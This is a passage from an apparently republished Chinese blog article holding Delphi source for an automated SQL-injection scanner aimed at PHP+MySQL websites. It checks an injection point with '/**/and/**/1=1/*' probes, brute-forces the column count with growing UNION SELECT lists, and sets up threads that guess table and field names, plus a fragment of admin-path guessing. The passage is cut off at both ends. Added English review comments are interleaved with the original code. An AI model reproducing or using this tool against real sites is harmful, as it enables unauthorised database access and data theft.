PHP+MYSQL网站注入扫描[10]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选自 lanyus 的 blog

;
    end;
  end;
  mm.lines.add('');
  mm.lines.add('后台路径猜解结束。。。');
except
end; }
end;

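procedure tform1.listbox1click(sender: tobject);
// Navigates the embedded browser (wb) to the text held by listbox1 and then
// brings the browser page (index 3 of pcphpinj) to the front.
begin
  // TStrings.GetText hands back a caller-owned PChar that the original never
  // released, so each click leaked a copy of the list. The Text property is
  // the same content (all items, line-separated) as a managed string.
  wb.navigate(listbox1.items.text);
  // NOTE(review): as before, this navigates to every item joined by line
  // breaks; if the clicked entry alone is intended,
  // listbox1.items[listbox1.itemindex] would be the usual form - confirm.
  pcphpinj.activepageindex := 3;
end;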

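procedure tform1.formshow(sender: tobject);
// Prepares the status-bar progress bar (pg1): created once, owned by the form,
// sized to cover statusbar1 and hidden until a scan needs it.
begin
  // The original created a fresh owner-less TProgressBar on every OnShow, so a
  // form hidden and shown again leaked the previous instance. Create it only
  // when it does not exist yet and let the form free it.
  // (assumes pg1 is a nil-initialised field or global - confirm its declaration)
  if not assigned(pg1) then
  begin
    pg1 := tprogressbar.create(self);
    pg1.parent := statusbar1;
  end;
  pg1.height := statusbar1.height;
  pg1.width := statusbar1.width;
  pg1.visible := false;
end;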

end.


unit unit2;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,idhttp;

var
cs:trtlcriticalsection;   // global critical section shared by the scanner threads
                          // NOTE(review): it is initialised in scantablethread.create,
                          // i.e. once per thread created, and no DeleteCriticalSection
                          // appears in this unit - confirm it is initialised exactly
                          // once (unit initialization) and that the shared memo/listview
                          // updates actually enter/leave it; nothing visible here does.

type
// Base worker thread: checks whether the target URL answers the injection
// probes and, if so, counts the columns at the injection point (see execute).
scanthread = class(tthread)
protected
  furl,injurl,fstr: string; // furl: target URL; injurl: probe URL built from it; fstr: extra string set by the subclass constructors
  fkeyword: string; // keyword that must appear in the response for a probe to count as a hit
  fstate: boolean;  // set once the column count is found or the cap is reached
  fmemo: tmemo;     // memo that receives the progress log lines
  flistview: tlistview; // list view that receives scan results
  fnum: integer;    // presumably the column count passed to scanfieldthread.create - confirm
  ftable,fvalue :string; // ftable: presumably the table name passed to scanfieldthread.create; fvalue: value appended to flistview by scantableresult
  procedure execute; override;
public
  //constructor create(url,keyword:string;memo:tmemo); // disabled: execute reads its inputs from form1 instead
end;
// Thread that scans for table names at the injection point.
scantablethread = class(scanthread)
private
  procedure scantableresult; // appends fvalue as a row of flistview
protected
  procedure execute; override;
public
  constructor create(url,str,keyword:string;memo:tmemo;listview:tlistview);
end;
// Thread that scans for field (column) names of one table.
scanfieldthread = class(scanthread)
private
  procedure scanfieldresult; // presumably the counterpart of scantableresult; body not in view
protected
  procedure execute; override;
public
  constructor create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
end;

// Fetches url over HTTP and reports whether the reply is usable: true on
// HTTP 200 when key is empty, or on HTTP 200 with key found in the body.
// Any exception is swallowed and yields false (see the implementation).
function get(url,key: string): boolean;

var
stoped:boolean; // NOTE(review): not referenced anywhere in the visible part of the unit;
                // confirm the scan loops read it, otherwise it cannot stop a scan.

implementation

uses unit1;

function get(url,key: string): boolean;
// Issues one HTTP GET for url with an Indy client. Returns true when the
// reply is HTTP 200 and, for a non-empty key, the body contains key
// (case-sensitive Pos search). Every failure - timeout, connection error,
// protocol exception - is swallowed and reported as false.
var
  client: tidhttp;
  body: string;
begin
  result := false;
  client := tidhttp.create(nil);
  try
    try
      client.handleredirects := true;  // redirects must be followed or some targets raise
      client.readtimeout := 30000;     // stop waiting for a reply after 30 s
      body := client.get(url);
      // a 200 is required either way; the keyword test applies only when one was given
      result := (client.responsecode = 200) and ((key = '') or (pos(key, body) > 0));
    except
      // best-effort probe: any exception simply means "no match"
    end;
  finally
    client.free;
  end;
end;

{constructor scanthread.create(url,keyword:string;memo:tmemo);
begin
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
freeonterminate := true; // 自动删除
inherited create(false); // 直接运行
end;}

// Base scan: confirms the injection point answers the three probe URLs, then
// counts columns by extending a UNION SELECT list one number per round until a
// response contains fkeyword or more than 30 columns were tried.
// NOTE(review): this runs on the worker thread yet writes to form1's memo and
// spin controls directly - VCL controls are not thread-safe, so those lines
// belong inside Synchronize/Queue. The loop also never checks Terminated or
// the unit's stoped flag, so Terminate alone will not end a running scan.
procedure scanthread.execute;
var
i:integer;    // column count currently under test
istr:string;  // comma-separated column list '1,2,...,i'
begin
// inputs are read from form1 rather than passed via the (commented-out) constructor
fmemo :=form1.mm;
furl :=trim(form1.edtinjurl.text);
fkeyword :=trim(form1.edtkey.text);
fmemo.lines.clear;
fmemo.lines.add('正在检测注入点是否可用。。。');
// reachability check: the plain URL and both fixed probes must all return
// HTTP 200 (empty key -> status only). These literal /**/and/**/.../* markers
// are exactly what an access-log or WAF rule would match on.
if (not get(furl,'')) or (not get(furl+'/**/and/**/1=1/*',''))
    or (not get(furl+'/**/and/**/1=2/*','')) then
begin
  fmemo.lines.add('注入点不可用,猜解终止!');
  exit;
end;
// start guessing the column count; inc runs before the first probe, so the
// first list tried is '1,2'
i:=1;
istr:='1';
fstate :=false;
fmemo.lines.add('');
fmemo.lines.add('开始猜解字段数目。。。');
fmemo.lines.add('');
while not fstate do
begin
  inc(i);
  if i>30 then
  begin
    // hard cap: give up once 30 columns are exceeded
    fmemo.lines.add('最大猜解字段数大于30,猜解终止!');
    fstate :=true;
    exit;
  end;
  istr:=istr+','+inttostr(i);
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+istr+'/*';
  fmemo.lines.add(injurl); // every probe URL is logged to the memo
  // a hit needs HTTP 200 plus fkeyword somewhere in the body
  if get(injurl,fkeyword) then
  begin
    fstate :=true;
    fmemo.lines.add('');
    fmemo.lines.add('字段数目猜解结束!共找到'+inttostr(i)+'个字段。');
    // publish the count to the form's controls (cross-thread VCL access, see above)
    form1.edtfieldnum.text :=inttostr(i);
    form1.spnum.maxvalue :=i;
    form1.spnum.text :=inttostr(i);
    form1.spfield1.maxvalue :=i;
    form1.spfield2.maxvalue :=i;
    exit;
  end;
end;
end;

// Builds a table-name scan thread. All fields are assigned before
// inherited create(false) so execute starts with them populated;
// freeonterminate lets the object free itself once execute returns.
constructor scantablethread.create(url,str,keyword:string;memo:tmemo;listview:tlistview);
begin
flistview :=listview;
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
fstr :=str;
freeonterminate := true; // frees itself on termination
// NOTE(review): the unit-global critical section cs is re-initialised here on
// every thread created; re-initialising a section another thread may be
// holding is unsafe, and nothing visible ever calls DeleteCriticalSection.
// Initialise it once in the unit's initialization section instead.
initializecriticalsection(cs); // initialise the critical section
//inherited create(furl,fkeyword,fmemo); // run directly (disabled, see the commented-out base constructor)
inherited create(false); // create unsuspended: execute starts immediately
end;

procedure scantablethread.scantableresult;
// Appends fvalue as a new row of flistview: the caption is the running row
// number (item count after the add) and fvalue goes into the first sub-item.
// Touches a VCL control, so presumably it is invoked through Synchronize
// from execute - confirm, since execute's body is not in view.
var
  row: tlistitem;
begin
  row := flistview.items.add;
  row.caption := inttostr(flistview.items.count);
  row.subitems.add(fvalue);
end;

//在一个线程内完成表段猜解工作
procedure scantablethread.execute;
var i:

本文关键:PHP+MYSQL网站注入扫描